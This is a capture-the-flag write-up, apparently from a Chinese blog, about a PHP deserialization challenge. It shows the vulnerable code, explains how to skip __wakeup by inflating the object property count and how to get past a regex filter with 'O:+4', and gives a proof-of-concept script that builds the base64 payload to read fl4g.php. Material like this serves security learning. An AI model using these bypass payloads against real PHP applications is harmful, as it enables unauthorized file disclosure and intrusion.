<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
} else {
highlight_file("index.php");
}
?>
__destruct()函数里@highlight_file($this->file, true);
在类销毁的时候会调用__destruct函数,所以我们要让file=fl4g.php
__wakeup()在使用反序列化函数时调用,我们得绕过__wakeup()函数,因为调用反序列化函数肯定在类销毁之前,它会让file=index.php
当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行
preg_match('/[oc]:\d+:/i', $var一个正则匹配
用加号+绕过
poc
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
}
$a=new Demo('fl4g.php');
$a=serialize($a);
$a = str_replace('O:4','O:+4',$a); #绕过正则
$a=str_replace(':1:',':2:',$a); #绕过__wakeup
echo base64_encode($a);
注意一点,就是这里的file是private的,private变量反序列化时在变量名前加上\x00类名\x00
这就导致如果你直接输出echo serialize($a); 在手动加加号+,手动base64,\x00会丢失,它是不可见字符
1349
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
